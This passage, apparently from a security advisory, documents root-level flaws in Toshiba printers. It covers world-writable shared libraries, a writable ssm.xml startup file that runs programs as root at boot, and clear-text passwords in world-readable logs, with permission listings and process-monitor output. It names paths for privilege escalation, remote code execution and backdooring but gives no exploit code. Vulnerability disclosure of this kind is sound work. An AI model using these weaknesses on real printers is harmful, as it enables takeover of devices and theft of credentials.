\/>\/home\/SYSROM_SRC\/build\/release\/lib\/libroken.so.18 (0x759c2000)<br \/>libheimntlm.so.0 =&gt;<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libheimntlm.so.0 (0x759bc000)<br \/>bash-4.1#<\/p>\n<p>We can find these 31 insecure libraries:<\/p>\n<p>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/lib\/libciindexeddb.so.0<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/lib\/libsyscallerr.so.0<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/lib\/libcios.so.0<br \/>&#8211; &#8211; \/mfp\/lib\/libatawrapper.so.0.0<br \/>&#8211; &#8211; \/mfp\/lib\/libmfpcommonwrapper.so.0.0<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libcrypto.so.1.0.0<br \/>&#8211; &#8211; \/mfp\/lib\/libsvml.so<br \/>&#8211; &#8211; 
\/home\/SYSROM_SRC\/build\/release\/lib\/libllmnrclient.so.0<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libsqlite.so.0.8.6<br \/>&#8211; &#8211; \/mfp\/lib\/libcpanel.so.0.0<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/lib\/libcimsg.so.0<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libsqlite.so.0.8.6<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/lib\/libcimsg.so.0<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/lib\/libcissmclient.so.0<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/lib\/libssdk.so.0.0.0<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/lib\/libcihdb.so.0<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libldap-2.4.so.2.5.6<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libssl.so.1.0.0<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libgssapi.so.2.0.0<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libkrb5.so.25.0.0<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/NoBuildItems\/common\/lib\/libCryptolib.so.0<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/NoBuildItems\/common\/lib\/libCryptolib.so.0.0.0<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/thirdparty\/lib\/liblber-2.4.so.2.5.6<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libhx509.so.5.0.0<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libheimsqlite.so.0.0.0<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libhcrypto.so.4.1.0<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libasn1.so.8.0.0<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libwind.so.0.0.0<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libcom_err.so.1.1.3<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libroken.so.18.1.0<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libheimntlm.so.0.1.0<\/p>\n<p>The permissions of these 
libraries are insecure. A remote attacker can<br \/>overwrite them and achieve Remote Code Execution:<\/p>\n<p>-rwxrwxrwx 1 root root 322261 Dec 6 01:41<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libciindexeddb.so.0<br \/>-rwxrwxrwx 1 root root 343680 Dec 6 01:48<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libsyscallerr.so.0<br \/>-rwxrwxrwx 1 root root 566991 Dec 6 01:41<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libcios.so.0<br \/>-rwxrwxrwx 1 root root 139986 Sep 19 2019 \/mfp\/lib\/libatawrapper.so.0.0<br \/>-rwxrwxrwx 1 root root 38330 May 28 2019<br \/>\/mfp\/lib\/libmfpcommonwrapper.so.0.0<br \/>-rwxrwxrwx 1 apache messagebus 2765203 Dec 6 01:28<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libcrypto.so.1.0.0<br \/>-rwxrwxrwx 1 root root 9479623 Apr 25 2014 \/mfp\/lib\/libsvml.so<br \/>-rwxrwxrwx 1 root root 95211 Dec 6 02:00<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libllmnrclient.so.0<br \/>-rwxrwxrwx 1 root root 744984 Dec 6 01:27<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libsqlite.so.0.8.6<br \/>-rwxrwxrwx 1 root root 48131 Apr 8 2019 \/mfp\/lib\/libcpanel.so.0.0<br \/>-rwxrwxrwx 1 root root 58976 Dec 6 01:41<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libcimsg.so.0<br \/>-rwxrwxrwx 1 root root 744984 Dec 6 01:27<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libsqlite.so.0.8.6<br \/>-rwxrwxrwx 1 root root 58976 Dec 6 01:41<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libcimsg.so.0<br \/>-rwxrwxrwx 1 root root 127850 Dec 6 01:41<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libcissmclient.so.0<br \/>-rwxrwxrwx 1 root root 14101772 Dec 6 01:40<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libssdk.so.0.0.0<br \/>-rwxrwxrwx 1 root root 909064 Dec 6 01:41<br \/>\/home\/SYSROM_SRC\/build\/release\/lib\/libcihdb.so.0<br \/>-rwxrwxrwx 1 root root 269392 Dec 6 01:34<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libldap-2.4.so.2.5.6<br \/>-rwxrwxrwx 1 apache messagebus 485480 Dec 6 01:28<br 
\/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libssl.so.1.0.0<br \/>-rwxrwxrwx 1 root root 251701 Dec 6 01:27<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libgssapi.so.2.0.0<br \/>-rwxrwxrwx 1 root root 539700 Dec 6 01:27<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libkrb5.so.25.0.0<br \/>-rwxrwxrwx 1 root root 624082 Dec 6 04:53<br \/>\/home\/SYSROM_SRC\/NoBuildItems\/common\/lib\/libCryptolib.so.0<br \/>-rwxrwxrwx 1 root root 624082 Apr 20 2018<br \/>\/home\/SYSROM_SRC\/NoBuildItems\/common\/lib\/libCryptolib.so.0.0.0<br \/>-rwxrwxrwx 1 root root 60708 Dec 6 01:34<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/liblber-2.4.so.2.5.6<br \/>-rwxrwxrwx 1 root root 324233 Dec 6 01:27<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libhx509.so.5.0.0<br \/>-rwxrwxrwx 1 root root 525228 Dec 6 01:27<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libheimsqlite.so.0.0.0<br \/>-rwxrwxrwx 1 root root 225346 Dec 6 01:27<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libhcrypto.so.4.1.0<br \/>-rwxrwxrwx 1 root root 759349 Dec 6 01:27<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libasn1.so.8.0.0<br \/>-rwxrwxrwx 1 root root 166289 Dec 6 01:27<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libwind.so.0.0.0<br \/>-rwxrwxrwx 1 root root 14571 Dec 6 01:27<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libcom_err.so.1.1.3<br \/>-rwxrwxrwx 1 root root 92942 Dec 6 01:27<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libroken.so.18.1.0<br \/>-rwxrwxrwx 1 root root 24134 Dec 6 01:27<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/lib\/libheimntlm.so.0.1.0<\/p>\n<p>An attacker can remotely compromise any Toshiba printer.<\/p>\n<p>The libraries (hundreds of them) used by these programs can be<br \/>replaced by malicious libraries by any local or remote attacker.<\/p>\n<p>## Details &#8211; Local Privilege Escalation and Remote Code Execution using CISSM<\/p>\n<p>It was observed that the `cissm` program runs as root inside the<br \/>printers. 
This Toshiba-specific program will start child processes<br \/>as shown below, based on the content of the<br \/>`\/home\/SYSROM_SRC\/build\/common\/bin\/ssm.xml` XML file stored in the<br \/>printer:<\/p>\n<p>bash-4.1# ps auxw | grep cissm<br \/>root 1487 0.0 0.3 53496 10184 ? Sl 16:34 0:02<br \/>.\/cissm -T 7 -d ssm.xml<br \/>bash-4.1# pstree<br \/>[&#8230;]|-cissm-+-alAddressBookMg<br \/>| |-alCloning<br \/>| |-alExportImport<br \/>| |-alLogRetriever<br \/>| |-alLogmanager---{alLogmanager}<br \/>| |-alPanelStartLED---{alPanelStartLE}<br \/>| |-alPanelUIMessag---{alPanelUIMessa}<br \/>| |-alServiceUIPlug<br \/>| |-alUiFrameWork---24*[{alUiFrameWork}]<br \/>| |-alViewPlugin---3*[{alViewPlugin}]<br \/>| |-alaccountmgr---2*[{alaccountmgr}]<br \/>| |-alappmanager-+-2*[python---5*[{python}]]<br \/>| | `-15*[{alappmanager}]<br \/>| |-alboserver---7*[{alboserver}]<br \/>| |-alcbamanager---26*[{alcbamanager}]<br \/>| |-aldevauthmgmtpl<br \/>| |-aldeviceconfigp<br \/>| |-aldeviceservice---{aldeviceservic}<br \/>| |-aleFilingmgr<br \/>| |-alfilestoragem<br \/>| |-algrpmgr<br \/>| |-alhddalertmgr<br \/>| |-alhddbackuprest<br \/>| |-alhomedatamgr<br \/>| |-alifaxreceive<br \/>| |-alintegritychkm<br \/>| |-aljobcontroller---8*[{aljobcontrolle}]<br \/>[&#8230;]<\/p>\n<p>The XML configuration file used by cissm is located at<br \/>`\/home\/SYSROM_SRC\/build\/thirdparty\/bin\/ssm.xml` and has insecure<br \/>permissions:<\/p>\n<p>bash-4.1# ls -la \/home\/SYSROM_SRC\/build\/release\/bin\/ssm.xml<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/bin\/ssm.xml<br \/>\/home\/SYSROM_SRC\/build\/common\/bin\/ssm.xml<br \/>-rwxrwxrwx 1 root root 55245 Oct 7 2021<br \/>\/home\/SYSROM_SRC\/build\/common\/bin\/ssm.xml<br \/>lrwxrwxrwx 1 root root 28 Mar 14 16:27<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/ssm.xml -&gt;<br \/>..\/..\/thirdparty\/bin\/ssm.xml<br \/>lrwxrwxrwx 1 root root 24 Mar 14 16:27<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/bin\/ssm.xml -&gt;<br 
\/>..\/..\/common\/bin\/ssm.xmlroot<\/p>\n<p>This file is used to run programs as root when the printer starts and<br \/>can be used to redefine any program running as root when the printer<br \/>boots. The `cissm` program also re-runs every 3 minutes.<\/p>\n<p>An attacker can remotely write an additional entry to start a<br \/>malicious command that will be executed as root when the printer<br \/>boots:<\/p>\n<p>Content of `\/home\/SYSROM_SRC\/build\/common\/bin\/ssm.xml`:<\/p>\n<p>&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;<br \/>&lt;SSM xmlns:xsi=&quot;http:\/\/www.w3.org\/2001\/XMLSchema-instance&quot;<br \/>xsi:noNamespaceSchemaLocation=&quot;..\/..\/..\/LayerInterface\/CI\/ServiceStartupManager\/SSM.xsd&quot;&gt;<br \/>&lt;!-- Start: CI Layer services --&gt;<br \/>&lt;Service&gt;<br \/>&lt;name&gt;cischeduler&lt;\/name&gt;<br \/>&lt;group\/&gt;<br \/>&lt;exePath&gt;.\/cischeduler&lt;\/exePath&gt;<br \/>&lt;startupType&gt;Automatic&lt;\/startupType&gt;<br \/>&lt;enabled&gt;1&lt;\/enabled&gt;<br \/>&lt;ProcessGroup&gt;TRUSTED&lt;\/ProcessGroup&gt;<br \/>&lt;StartParameters&gt;<br \/>&lt;Param&gt;-S&lt;\/Param&gt;<br \/>&lt;Param&gt;ramdisk&lt;\/Param&gt;<br \/>&lt;Param&gt;&gt;&lt;\/Param&gt;<br \/>&lt;Param&gt;\/work\/log\/ci\/cischeduler.log&lt;\/Param&gt;<br \/>&lt;\/StartParameters&gt;<br \/>&lt;\/Service&gt;<br \/>&lt;Service&gt;<br \/>&lt;name&gt;cipollproc&lt;\/name&gt;<br \/>&lt;group\/&gt;<br \/>&lt;exePath&gt;.\/cipollproc&lt;\/exePath&gt;<br \/>&lt;startupType&gt;Automatic&lt;\/startupType&gt;<br \/>&lt;enabled&gt;1&lt;\/enabled&gt;<br \/>&lt;ProcessGroup&gt;TRUSTED&lt;\/ProcessGroup&gt;<br \/>&lt;StartParameters&gt;<br \/>&lt;Param&gt;&gt;&lt;\/Param&gt;<br \/>&lt;Param&gt;\/work\/log\/ci\/cipollproc.log&lt;\/Param&gt;<br \/>&lt;\/StartParameters&gt;<br \/>&lt;StartupCondition&gt;<br \/>&lt;Condition&gt;<br \/>&lt;Service name=&quot;cischeduler&quot; state=&quot;Ready&quot;&gt;&lt;\/Service&gt;<br 
\/>&lt;\/Condition&gt;<br \/>&lt;\/StartupCondition&gt;<br \/>&lt;\/Service&gt;<br \/>[&#8230;]\n<p>Analysis of `pspy32` running on the printer:<\/p>\n<p>2023\/05\/27 20:32:43 CMD: UID=0 PID=4228 | watch -n 3 -t if [<br \/>-e \/root\/sshd_start.sh ]; then dos2unix \/root\/sshd_start.sh &amp;&amp; chmod<br \/>+x \/root\/sshd_start.sh &amp;&amp; \/root\/sshd_start.sh &amp;&amp; rm<br \/>\/root\/sshd_start.sh || rm \/root\/sshd_start.sh; fi<br \/>2023\/05\/27 20:32:43 CMD: UID=0 PID=4229 | watch -n 3 -t if [<br \/>-e \/root\/sshd_start.sh ]; then dos2unix \/root\/sshd_start.sh &amp;&amp; chmod<br \/>+x \/root\/sshd_start.sh &amp;&amp; \/root\/sshd_start.sh &amp;&amp; rm<br \/>\/root\/sshd_start.sh || rm \/root\/sshd_start.sh; fi<br \/>2023\/05\/27 20:32:46 CMD: UID=0 PID=4230 | watch -n 3 -t if [<br \/>-e \/root\/sshd_start.sh ]; then dos2unix \/root\/sshd_start.sh &amp;&amp; chmod<br \/>+x \/root\/sshd_start.sh &amp;&amp; \/root\/sshd_start.sh &amp;&amp; rm<br \/>\/root\/sshd_start.sh || rm \/root\/sshd_start.sh; fi<br \/>2023\/05\/27 20:32:46 CMD: UID=0 PID=4231 | watch -n 3 -t if [<br \/>-e \/root\/sshd_start.sh ]; then dos2unix \/root\/sshd_start.sh &amp;&amp; chmod<br \/>+x \/root\/sshd_start.sh &amp;&amp; \/root\/sshd_start.sh &amp;&amp; rm<br \/>\/root\/sshd_start.sh || rm \/root\/sshd_start.sh; fi<br \/>2023\/05\/27 20:32:50 CMD: UID=0 PID=4232 | watch -n 3 -t if [<br \/>-e \/root\/sshd_start.sh ]; then dos2unix \/root\/sshd_start.sh &amp;&amp; chmod<br \/>+x \/root\/sshd_start.sh &amp;&amp; \/root\/sshd_start.sh &amp;&amp; rm<br \/>\/root\/sshd_start.sh || rm \/root\/sshd_start.sh; fi<br \/>2023\/05\/27 20:32:50 CMD: UID=0 PID=4233 | watch -n 3 -t if [<br \/>-e \/root\/sshd_start.sh ]; then dos2unix \/root\/sshd_start.sh &amp;&amp; chmod<br \/>+x \/root\/sshd_start.sh &amp;&amp; \/root\/sshd_start.sh &amp;&amp; rm<br \/>\/root\/sshd_start.sh || rm \/root\/sshd_start.sh; fi<br \/>2023\/05\/27 20:32:53 CMD: UID=0 PID=4234 | watch -n 3 -t if [<br \/>-e 
\/root\/sshd_start.sh ]; then dos2unix \/root\/sshd_start.sh &amp;&amp; chmod<br \/>+x \/root\/sshd_start.sh &amp;&amp; \/root\/sshd_start.sh &amp;&amp; rm<br \/>\/root\/sshd_start.sh || rm \/root\/sshd_start.sh; fi<br \/>2023\/05\/27 20:32:53 CMD: UID=0 PID=4235 | watch -n 3 -t if [<br \/>-e \/root\/sshd_start.sh ]; then dos2unix \/root\/sshd_start.sh &amp;&amp; chmod<br \/>+x \/root\/sshd_start.sh &amp;&amp; \/root\/sshd_start.sh &amp;&amp; rm<br \/>\/root\/sshd_start.sh || rm \/root\/sshd_start.sh; fi<br \/>2023\/05\/27 20:32:56 CMD: UID=0 PID=4236 | watch -n 3 -t if [<br \/>-e \/root\/sshd_start.sh ]; then dos2unix \/root\/sshd_start.sh &amp;&amp; chmod<br \/>+x \/root\/sshd_start.sh &amp;&amp; \/root\/sshd_start.sh &amp;&amp; rm<br \/>\/root\/sshd_start.sh || rm \/root\/sshd_start.sh; fi<br \/>2023\/05\/27 20:32:56 CMD: UID=0 PID=4237 | .\/cissm -T 7 -d ssm.xml<br \/>2023\/05\/27 20:32:56 CMD: UID=0 PID=4238 | watch -n 3 -t if [<br \/>-e \/root\/sshd_start.sh ]; then dos2unix \/root\/sshd_start.sh &amp;&amp; chmod<br \/>+x \/root\/sshd_start.sh &amp;&amp; \/root\/sshd_start.sh &amp;&amp; rm<br \/>\/root\/sshd_start.sh || rm \/root\/sshd_start.sh; fi<br \/>[&#8230;]2023\/05\/27 20:35:26 CMD: UID=0 PID=4393 | .\/cissm -T 7 -d ssm.xml<br \/>[&#8230;]2023\/05\/27 20:37:56 CMD: UID=0 PID=4532 | .\/cissm -T 7 -d ssm.xml<br \/>[&#8230;]2023\/05\/27 20:39:56 CMD: UID=0 PID=4676 | .\/cissm -T 7 -d ssm.xml<br \/>[&#8230;]2023\/05\/27 20:42:19 CMD: UID=0 PID=4831 | watch -n 3 -t if [<br \/>-e \/root\/sshd_start.sh ]; then dos2unix \/root\/sshd_start.sh &amp;&amp; chmod<br \/>+x \/root\/sshd_start.sh &amp;&amp; \/root\/sshd_start.sh &amp;&amp; rm<br \/>\/root\/sshd_start.sh || rm \/root\/sshd_start.sh; fi<br \/>2023\/05\/27 20:42:19 CMD: UID=0 PID=4832 | watch -n 3 -t if [<br \/>-e \/root\/sshd_start.sh ]; then dos2unix \/root\/sshd_start.sh &amp;&amp; chmod<br \/>+x \/root\/sshd_start.sh &amp;&amp; \/root\/sshd_start.sh &amp;&amp; rm<br \/>\/root\/sshd_start.sh || rm 
\/root\/sshd_start.sh; fi<br \/>2023\/05\/27 20:42:22 CMD: UID=0 PID=4833 | watch -n 3 -t if [<br \/>-e \/root\/sshd_start.sh ]; then dos2unix \/root\/sshd_start.sh &amp;&amp; chmod<br \/>+x \/root\/sshd_start.sh &amp;&amp; \/root\/sshd_start.sh &amp;&amp; rm<br \/>\/root\/sshd_start.sh || rm \/root\/sshd_start.sh; fi<br \/>2023\/05\/27 20:42:22 CMD: UID=0 PID=4834 | watch -n 3 -t if [<br \/>-e \/root\/sshd_start.sh ]; then dos2unix \/root\/sshd_start.sh &amp;&amp; chmod<br \/>+x \/root\/sshd_start.sh &amp;&amp; \/root\/sshd_start.sh &amp;&amp; rm<br \/>\/root\/sshd_start.sh || rm \/root\/sshd_start.sh; fi<br \/>2023\/05\/27 20:42:25 CMD: UID=0 PID=4835 | watch -n 3 -t if [<br \/>-e \/root\/sshd_start.sh ]; then dos2unix \/root\/sshd_start.sh &amp;&amp; chmod<br \/>+x \/root\/sshd_start.sh &amp;&amp; \/root\/sshd_start.sh &amp;&amp; rm<br \/>\/root\/sshd_start.sh || rm \/root\/sshd_start.sh; fi<br \/>2023\/05\/27 20:42:25 CMD: UID=0 PID=4836 | watch -n 3 -t if [<br \/>-e \/root\/sshd_start.sh ]; then dos2unix \/root\/sshd_start.sh &amp;&amp; chmod<br \/>+x \/root\/sshd_start.sh &amp;&amp; \/root\/sshd_start.sh &amp;&amp; rm<br \/>\/root\/sshd_start.sh || rm \/root\/sshd_start.sh; fi<br \/>2023\/05\/27 20:42:26 CMD: UID=0 PID=4837 | .\/cissm -T 7 -d ssm.xml<br \/>2023\/05\/27 20:42:27 CMD: UID=0 PID=4839 | sh -c ps -eo<br \/>stat,comm | grep -e &#8220;^Z.*agent&#8221; -e &#8220;^Z.*ebx_dl&#8221; -e &#8220;^Z.*de_ipfax&#8221;<br \/>2023\/05\/27 20:42:27 CMD: UID=0 PID=4838 | sh -c ps -eo<br \/>stat,comm | grep -e &#8220;^Z.*agent&#8221; -e &#8220;^Z.*ebx_dl&#8221; -e &#8220;^Z.*de_ipfax&#8221;<br \/>2023\/05\/27 20:42:29 CMD: UID=0 PID=4840 | watch -n 3 -t if [<br \/>-e \/root\/sshd_start.sh ]; then dos2unix \/root\/sshd_start.sh &amp;&amp; chmod<br \/>+x \/root\/sshd_start.sh &amp;&amp; \/root\/sshd_start.sh &amp;&amp; rm<br \/>\/root\/sshd_start.sh || rm \/root\/sshd_start.sh; fi<br \/>2023\/05\/27 20:42:29 CMD: UID=0 PID=4841 | watch -n 3 -t if [<br \/>-e 
\/root\/sshd_start.sh ]; then dos2unix \/root\/sshd_start.sh &amp;&amp; chmod<br \/>+x \/root\/sshd_start.sh &amp;&amp; \/root\/sshd_start.sh &amp;&amp; rm<br \/>\/root\/sshd_start.sh || rm \/root\/sshd_start.sh; fi<br \/>2023\/05\/27 20:42:32 CMD: UID=0 PID=4842 | watch -n 3 -t if [<br \/>-e \/root\/sshd_start.sh ]; then dos2unix \/root\/sshd_start.sh &amp;&amp; chmod<br \/>+x \/root\/sshd_start.sh &amp;&amp; \/root\/sshd_start.sh &amp;&amp; rm<br \/>\/root\/sshd_start.sh || rm \/root\/sshd_start.sh; fi<br \/>2023\/05\/27 20:42:32 CMD: UID=0 PID=4843 | watch -n 3 -t if [<br \/>-e \/root\/sshd_start.sh ]; then dos2unix \/root\/sshd_start.sh &amp;&amp; chmod<br \/>+x \/root\/sshd_start.sh &amp;&amp; \/root\/sshd_start.sh &amp;&amp; rm<br \/>\/root\/sshd_start.sh || rm \/root\/sshd_start.sh; fi<br \/>[&#8230;]<\/p>\n<p>An attacker can remotely compromise any Toshiba printer.<\/p>\n<p>The `\/home\/SYSROM_SRC\/build\/common\/bin\/ssm.xml` configuration file can<br \/>be replaced by any local or remote attacker to run any malicious<br \/>program as root when the printer starts.<\/p>\n<p>Attackers can backdoor the printer.<\/p>\n<p>## Details &#8211; Passwords stored in clear-text logs and insecure logs<\/p>\n<p>It was observed that passwords are stored in clear-text logs.<\/p>\n<p>Some logs are stored inside the `\/ramdisk\/work\/log\/al` directory with<br \/>insecure permissions, allowing any local attacker to read and modify<br \/>these files:<\/p>\n<p>bash-4.1# ls -laR \/ramdisk\/work\/log\/al\/*<br \/>-rw-rw-rw- 1 root trusted 42678 May 23 16:10<br \/>\/ramdisk\/work\/log\/al\/accounting.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 2228 May 23 15:14<br \/>\/ramdisk\/work\/log\/al\/address.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 6877 May 23 15:16<br \/>\/ramdisk\/work\/log\/al\/alPanelStartLEDHandler.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 23536 May 23 16:10<br \/>\/ramdisk\/work\/log\/al\/alPanelUIMessageHandler.log.0.txt<br \/>-rw-rw-rw- 1 root 
trusted 79 May 23 15:14<br \/>\/ramdisk\/work\/log\/al\/albluetooth.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 449 May 23 15:14<br \/>\/ramdisk\/work\/log\/al\/alcloning.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 1594 May 23 15:14<br \/>\/ramdisk\/work\/log\/al\/alcloudclient.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 987 May 23 15:14<br \/>\/ramdisk\/work\/log\/al\/aldevauthmgmtplugin.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 307378 May 23 16:11<br \/>\/ramdisk\/work\/log\/al\/aldeviceconfig.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 29171 May 23 15:16<br \/>\/ramdisk\/work\/log\/al\/aldeviceservice.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 128 May 23 15:15<br \/>\/ramdisk\/work\/log\/al\/aleSCL.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 474 May 23 15:14<br \/>\/ramdisk\/work\/log\/al\/alexportimport.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 1437 May 23 15:14<br \/>\/ramdisk\/work\/log\/al\/alfilestoragem.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 13465 May 23 16:11<br \/>\/ramdisk\/work\/log\/al\/allicensemgmt.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 5380 May 23 15:14<br \/>\/ramdisk\/work\/log\/al\/almaintenanceplugin.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 111 May 23 15:14<br \/>\/ramdisk\/work\/log\/al\/alnfcplugin.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 4432 May 23 16:05<br \/>\/ramdisk\/work\/log\/al\/alulm.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 682 May 23 15:14<br \/>\/ramdisk\/work\/log\/al\/alvnclauncher.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 67235 May 23 16:08<br \/>\/ramdisk\/work\/log\/al\/appmanager.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 31306 May 23 16:11<br \/>\/ramdisk\/work\/log\/al\/authplugin.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 590 May 23 15:15<br \/>\/ramdisk\/work\/log\/al\/bonjour.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 147834 May 23 16:15<br \/>\/ramdisk\/work\/log\/al\/boserver.log.0.txt<br \/>-rwxrwxrwx 1 root trusted 250542 May 23 16:14<br \/>\/ramdisk\/work\/log\/al\/boserverEvent.log.28.txt<br \/>-rw-rw-rw- 1 root 
trusted 1110 May 23 15:14<br \/>\/ramdisk\/work\/log\/al\/cbamanager.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 98 May 23 15:14<br \/>\/ramdisk\/work\/log\/al\/eBRlog.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 3311 May 23 15:15<br \/>\/ramdisk\/work\/log\/al\/efile.log.0.txt<br \/>-rwxrwxrwx 1 root trusted 567 May 23 16:10<br \/>\/ramdisk\/work\/log\/al\/grpmgrplugin.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 2277 May 23 16:10<br \/>\/ramdisk\/work\/log\/al\/hdm.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 206 May 23 15:15<br \/>\/ramdisk\/work\/log\/al\/ifaxrx.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 1037 May 23 15:14<br \/>\/ramdisk\/work\/log\/al\/jobcontroller.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 4714 May 23 15:41<br \/>\/ramdisk\/work\/log\/al\/jtm.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 610 May 23 15:15<br \/>\/ramdisk\/work\/log\/al\/logmanagerplugin.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 286932 May 23 15:23<br \/>\/ramdisk\/work\/log\/al\/logretriever.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 214 May 23 15:15<br \/>\/ramdisk\/work\/log\/al\/network-ipv6.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 22498 May 23 15:16<br \/>\/ramdisk\/work\/log\/al\/nsm.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 169537 May 23 16:01<br \/>\/ramdisk\/work\/log\/al\/panel.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 3403 May 23 15:15<br \/>\/ramdisk\/work\/log\/al\/printmanager.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 26623 May 23 16:10<br \/>\/ramdisk\/work\/log\/al\/prm.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 1264 May 23 15:15<br \/>\/ramdisk\/work\/log\/al\/remoteApplication.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 565116 May 23 16:11<br \/>\/ramdisk\/work\/log\/al\/renderer.log.2.txt<br \/>-rw-rw-rw- 1 root trusted 2434 May 23 15:14<br \/>\/ramdisk\/work\/log\/al\/reportmanager.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 426 May 23 15:14<br \/>\/ramdisk\/work\/log\/al\/reportmsgr.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 20834 May 23 16:11<br 
\/>\/ramdisk\/work\/log\/al\/restrictionmode.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 732 May 23 16:10<br \/>\/ramdisk\/work\/log\/al\/rolemanagerplugin.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 12464 May 23 16:11<br \/>\/ramdisk\/work\/log\/al\/securitysettingsplugin.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 19963 May 23 15:15<br \/>\/ramdisk\/work\/log\/al\/sharedprint.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 159 May 23 15:15<br \/>\/ramdisk\/work\/log\/al\/slp.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 798 May 23 15:15<br \/>\/ramdisk\/work\/log\/al\/snmpd.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 12287 May 23 15:15<br \/>\/ramdisk\/work\/log\/al\/stage2.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 5955 May 23 15:15<br 